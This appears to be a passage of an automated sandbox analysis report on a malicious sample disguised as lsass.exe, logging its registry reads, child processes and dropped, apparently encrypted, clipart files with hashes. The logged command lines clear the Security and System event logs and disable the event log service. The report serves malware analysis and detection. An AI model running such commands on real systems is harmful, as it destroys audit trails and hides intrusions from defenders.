Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\wevtutil.exe os_pid = 0xbec, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a350000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x76c4a84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x76c53b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76c4a79d True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:29 (UTC) True 1
Fn
Get Time type = Ticks, time = 153926 True 1
Fn
Get Time type = Performance Ctr, time = 21587813920 True 1
Fn
Environment (17)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 6
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #37: wevtutil.exe
0 0
»
Information Value
ID #37
File Name c:\windows\syswow64\wevtutil.exe
Command Line wevtutil.exe clear-log Security
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:35, Reason: Child Process
Unmonitor End Time: 00:01:35, Reason: Self Terminated
Monitor Duration 00:00:00
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xbec
Parent PID 0xa78 (c:\windows\syswow64\cmd.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x BFC
0x BF0
Process #38: cmd.exe
59 0
»
Information Value
ID #38
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log System
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:35, Reason: Child Process
Unmonitor End Time: 00:01:36, Reason: Self Terminated
Monitor Duration 00:00:01
OS Process Information
»
Information Value
PID 0xb64
Parent PID 0xc4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x B60
Host Behavior
File (11)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info wevtutil.exe type = file_attributes True 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\wevtutil.exe os_pid = 0xb8c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4aa20000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x76c4a84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x76c53b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76c4a79d True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:30 (UTC) True 1
Fn
Get Time type = Ticks, time = 154144 True 1
Fn
Get Time type = Performance Ctr, time = 21609382653 True 1
Fn
Environment (17)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 6
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #39: wevtutil.exe
0 0
»
Information Value
ID #39
File Name c:\windows\syswow64\wevtutil.exe
Command Line wevtutil.exe clear-log System
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:35, Reason: Child Process
Unmonitor End Time: 00:01:36, Reason: Self Terminated
Monitor Duration 00:00:01
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xb8c
Parent PID 0xb64 (c:\windows\syswow64\cmd.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x B88
0x B84
Process #40: cmd.exe
58 0
»
Information Value
ID #40
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /C sc config eventlog start=disabled
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:35, Reason: Child Process
Unmonitor End Time: 00:01:37, Reason: Self Terminated
Monitor Duration 00:00:01
OS Process Information
»
Information Value
PID 0xb70
Parent PID 0xc4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x B6C
Host Behavior
File (10)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\sc.exe os_pid = 0x5c8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a740000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x76c4a84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x76c53b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76c4a79d True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:30 (UTC) True 1
Fn
Get Time type = Ticks, time = 154362 True 1
Fn
Get Time type = Performance Ctr, time = 21630202990 True 1
Fn
Environment (17)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 6
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000667 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #41: sc.exe
8 0
»
Information Value
ID #41
File Name c:\windows\syswow64\sc.exe
Command Line sc config eventlog start=disabled
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:36, Reason: Child Process
Unmonitor End Time: 00:01:37, Reason: Self Terminated
Monitor Duration 00:00:01
OS Process Information
»
Information Value
PID 0x5c8
Parent PID 0xb70 (c:\windows\syswow64\cmd.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 8F8
0x 41C
Host Behavior
File (3)
»
Operation Filename Additional Information Success Count Logfile
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Write STD_OUTPUT_HANDLE size = 649 True 1
Fn
Data
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\sc.exe base_address = 0xf40000 True 1
Fn
Service (1)
»
Operation Additional Information Success Count Logfile
Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:30 (UTC) True 1
Fn
Get Time type = Ticks, time = 154440 True 1
Fn
Get Time type = Performance Ctr, time = 21643582475 True 1
Fn
Process #45: lsass.exe
41033 2
»
Information Value
ID #45
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe" *
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:03, Reason: Autostart
Unmonitor End Time: 00:04:20, Reason: Terminated by Timeout
Monitor Duration 00:02:17
OS Process Information
»
Information Value
PID 0x530
Parent PID 0x44c (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 534
0x 6DC
0x 6E0
0x 6E4
0x 6E8
0x 6EC
0x 700
0x 328
0x 314
0x 590
0x 670
0x 668
0x 7B0
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
lsass.exe 0x00400000 0x00448FFF Relevant Image - 32-bit - True False
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107288.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 13.12 KB MD5: 8b53241ed3117e59777f758a906be2e0
SHA1: 60255a0bd5fcb88956fa763315b7f56600342dbe
SHA256: 1caa9e4e3deadf86fe7fae7716f97f4f028b14296443ecbc20c4ecb8df8cbdc8
SSDeep: 384:/G0U8CP9jdbyEGhR1NjqqvDQQymfR9RXeazzrMwN8iDzT6vWTcBa+TjA5G6qPmMp:/G0U8CP9jdblYR1NjqqvDQQymfR9RXLQ
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107290.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 12.02 KB MD5: 3af01b266090bc263f70f26e187d9188
SHA1: 77199550344f38c1de02e0a8f0c69eb7ed6e4959
SHA256: d523ed922020194d53b5af2dea6b4f10027e9068dfc1d0fafb3d857450e5b8a7
SSDeep: 384:ye/gqPugZ6984YzOPthcRSNAJHckDgSJSOmqOx310TfQt4XWVL6uC7bqCDqeUX7R:yepPVZ69pYzOPthcRSNAJHFDpSOmqOxV
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107302.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.04 KB MD5: caa51981f790208fec5861a84ed882fe
SHA1: 7e8d04e7d1f62496457099eebf04077ef0812585
SHA256: 1b4597fc6b2b56b84e84084c9618fce0734c7b397e35ff7fdf5689ef42f3bfc4
SSDeep: 96:lJHLVeyQrh8bZ+9ZilTTorp5uxz+ofonMRtbLi8L02fRKPl4Wbf:PHL8yQWbZ+LilTsbu7gnMR5G8I2fReaU
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107308.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 15.52 KB MD5: 6cfe471841ce98aad52a1675d31b69a0
SHA1: b1fbc10ff8e1520d54d030dd518833de49d69941
SHA256: 87aa4371a87f878f2d024bd8b79ed0e908e66cd502301bc1b64c733f842a91ac
SSDeep: 384:UfGj5fHKMlWM4GthwvgoAD75cUgGukewsZ7t1zmPm+RZkVyO+UHEu6Vrba7uDN4q:UfGdfHKMlWM4GthwvgoAD75cUgGukewJ
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107316.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 11.02 KB MD5: 7cafe9318d11d3c7783545a8df7273df
SHA1: aaaa36f4e3b650a76de8b1ac69602b4f4b67c162
SHA256: 4238b6cf680b3b3c58521265563f1833f8a05a0bd42e2c59c137836ea491f1d2
SSDeep: 192:CNQ9DWz2hsJLksoeRJ5Vityipm7/99QGTmq52kwC7ZCxgZGlw42LG7YDXCt8w7Zm:CNQ9DWySJLkje5ctyic/99QGTrokwC7j
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107328.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.38 KB MD5: 3631bc5a9af7146794b975059ecb1dee
SHA1: 3483a589890f6b1fe7f19c5ec42d4f404ef0c2b6
SHA256: 25c15e8823fa81d7537add870e396368ff4cf6d3f49d68e51cb4e16df029d48d
SSDeep: 192:2n89Z2Bz7X4bJvj5h0Y+2k2Juw/TcovVUrwwHzlklMEev:2890Bz7X4h5+2k2Juwr/vVeXTlkl/M
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107350.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 23.12 KB MD5: 3378925ed5aea808a01a8960271ce219
SHA1: bdc2a3b19785c068cb1af6fc369917c12dc10c00
SHA256: 4f3362cae58f9dab6c38f9d32402345e843442b607e4bfe4bb99f5044a9f8d2f
SSDeep: 384:sVWZjfdP605HG98bWfaMtyp/WDoa4hKWlzYe7T7L3UcHQoi3SJIEiMREQrAF31km:sVWZjfdP605HG98bWfaoypODoa4hKWl0
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107364.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 16.20 KB MD5: 72bd82c5981b39ec105a841d89af9587
SHA1: 13810b98f348b02c3d0c24c9aee6d8ab9ec8b02c
SHA256: 4ead3a556034ccb691a808ff4cbac75084e676e88549ef712c5889c8d8a5168c
SSDeep: 384:mSs4uTMzj8NF1bm/vciX6+s4UtqeLCONmLO7QFY04ZmsodZQ3+zPI+7HfUlCGV7Z:mSs4uTMkNF1bm/vciXTs42TCONmLO7QO
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107426.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 11.22 KB MD5: 25a97e62e55e6b86da244fc8c78a697d
SHA1: 3c56509779d07f95ef85beefb06484aaf10e32a6
SHA256: 7cf50a3ff6109e212902d1ca9785b3c8dca26588fcda108b9d6cb1aad1fc3dab
SSDeep: 192:84LWkI4iw7RMuiJD9z48RzQHD6S93Xm7AsPPHSXNcoH2PcbwV6SK43DiwfCL31o5:84V6+biJDl3zQr9JsPPINcokR4SK4zia
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107446.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 29.63 KB MD5: d55dbf542ede184929bbfb760e0bee87
SHA1: eb54c55c08d68be15e0c9ae2b62cbdd836084e10
SHA256: 0b3ba7b76892068cd5ecffe17dd103e83ce1a803cf6b317740e1822513294a4e
SSDeep: 768:a8ZOzN6By6jk1GjXAO6uW3+0kpUtfTRFkDlpWwi4EJBestcLFyazPM6H0LKIPt+e:BZBfmtkpBCxgtGH6i
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107450.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.81 KB MD5: 9d6321cd08a967ef6faa5853ca30b21d
SHA1: 61d7080c8d1cb31c936640bf1bbc3969ba7aaef8
SHA256: 4ee697738bce6f6c5938a5e80dcaab59babe2ba2b41c7b10dc9b59a1b149c3d3
SSDeep: 96:O4JhTMDRUBryM2NWphRJ7fyMf72C712r4DupB41kJ7A1rmq6d57j:ptMD+BrGEXfOr4apBcAAyq6dpj
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107452.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 20.72 KB MD5: 243ddff13d7c9817ea9898d5ecaa7cc7
SHA1: bb801a6f03f6b5d21abe60de931f3d05c5b68599
SHA256: 4fccc5ae8144f64c1562494ea133730b5ce8b073d6f64d2297ed76ad5f5d4292
SSDeep: 384:yvVGkpGnqaPYC3IsEt0VqKKP3HNSJUBEt+hx+wbdRUxyQ2zsPo/IdAAWoAe2q3st:ytdiZIsEt0V9KPXNSJUBEt+hxVbdRUxU
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107456.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.64 KB MD5: f915f4dc931d283787604fe3722f2870
SHA1: 433d3304590f32bf59e632231402fa5ecc3a6e4a
SHA256: aececef37d22238f162b38d400e9152cef872074d927847f5c56c4e1312caaba
SSDeep: 96:d1JtwIjkpqHd4qZKe2bNDn2mxU7YGAILlMfAA4tV0/Ff:dfqIQpq94qMrbNDn2eiHA4A4tV0/Ff
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107458.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.49 KB MD5: 6f6d36014d2d79b1e8095a6fc9ca2ee8
SHA1: a99bc920a862ed6bff16514cbc2bbb4a879ee5e3
SHA256: 69f33eade56d831d923e10f83d72edbd070cdfe0f018e37c8f06e1d9a8dfb8fd
SSDeep: 96:UJIkg+7Gf7XFrs5qpp5j5LkUoKIzrG/qvqsy5q:aZg+7Gf7VrsGp5j5LkUo7/G/RsMq
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107468.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 9.39 KB MD5: 1c29e96a4df84f3ce725923c2ecb38f0
SHA1: 826cd906abf7cef9fb4fd4775e546ed578692e3b
SHA256: 6cf628b4c5e140186cfd0f00042b37c4f2d9c64b743258e3cd72690578fb400a
SSDeep: 192:pHnpxMqaiHPwKcUpkLtFU1+RL+hvz8RR3IhI4ykjORVtyBfghL1CkPbqLPvXbiPy:pJxPaiHPdcWkxFU1+J+RmR3CdykItyB3
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107480.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 5.88 KB MD5: 414482f2279e367fcef02b9656300e15
SHA1: ea05afdbca2217f6c663c38e3577f150fca43e2d
SHA256: 25e649cee79f74f9d3642372df1c91c56c408f286a0a8b5684d4a85f16fe026f
SSDeep: 96:TJLJz+8d5F1dZDNLzlP1vtuRuTEXGOC9GRgkX+pvctvNvcDoOK2PfaHpxta0Ox5R:FdS8d57dB3PTukTEk9GmkntlEDoOK1JG
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107482.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.86 KB MD5: 50bd11ab99f9b1ddeec7bb160c016fe6
SHA1: b25fbf495b9254e93a2495e9e682b8d1f706525e
SHA256: f317d8b07db6e87514b148192cc44ca61b85cafe3494c7e78b48553094302ca8
SSDeep: 96:Zabhfoml9wyRcVp6pmvC8rs5Nrf3sz6p+SGqOAokq1EAQYGN4:obdoi2FNC8rs5tG6p+SP15rN4
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107488.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.81 KB MD5: 973290f214909de5f746808208574be8
SHA1: 4b1b29bffbc58b9b719e9fdc0f875212a32d5230
SHA256: 78f26eb0d780bf2ac919286f945b058918acac28b199060ee53ffe9710f65061
SSDeep: 192:K/wuKVBgxUKKcw7EJhcs+93J0bL5q38jTy1rsOHXjLIABi4YjURc0x+4B9xtwhBJ:K/gBgeKbw7EJhcs+5JO5S8jTy1rsGXj4
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107494.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.27 KB MD5: 8a92eb8ab686ab2a29f4e547b3bb7d43
SHA1: fc80c61adcdde099753b05bc397e0d376b75e79e
SHA256: e9eee06eec1215070fcee7d635fd9a101ebe394bb4a158423b23417526a13adc
SSDeep: 192:fcTkvWUC3mLPwNZOUlCiuF3/ap7IdZldRxGz72c:fcTkvWB3mL4NsUl9A3CkDlAzCc
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107502.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 10.58 KB MD5: 0869188d9ead42f035b180dce791624a
SHA1: 96093edc2662dd7cde05cfdf256b6221dfc56517
SHA256: 126d1222853a823fe6eff32a1f6501fe1f94d1c0ae39cb3ed5090ff6b0cd8c34
SSDeep: 192:lQKTZb/zRGyaOt2B1FOUqM/0mCy1dziFgbq/BO+0f4uad/T6+P1YNV2GMo8pK4hJ:CKlb/3t2B1k4NCy/uSbqU+0f4uad/u+b
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107512.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 11.14 KB MD5: be971e78ff59e94335729bd52cabb6c4
SHA1: 81a6a69e30cb6cf15898d2c0d489181d802ebd14
SHA256: 7113c219eaf6fd9e7903f79722aa08d8412f4903258d5ee6fa24acf683aacd4b
SSDeep: 192:hyKvvZh1p/L4WXfLu2YK9PsrfhsE0/Ev/sdZz/E2Zqb5NH+4VRmMEBHj2456V8mv:hyCvZhv7junK9ErhsE0/wsHzMiqb5NHV
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107516.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 13.68 KB MD5: ed032ba4d49bda748c1f25aa63810158
SHA1: 6cd0ba0181e66204d184c3e420223f2f36baf5dc
SHA256: 5b9c8d3fa8f64d31111cc650ea70d045844acaa8f0d13c9dc4980b97a2a9603f
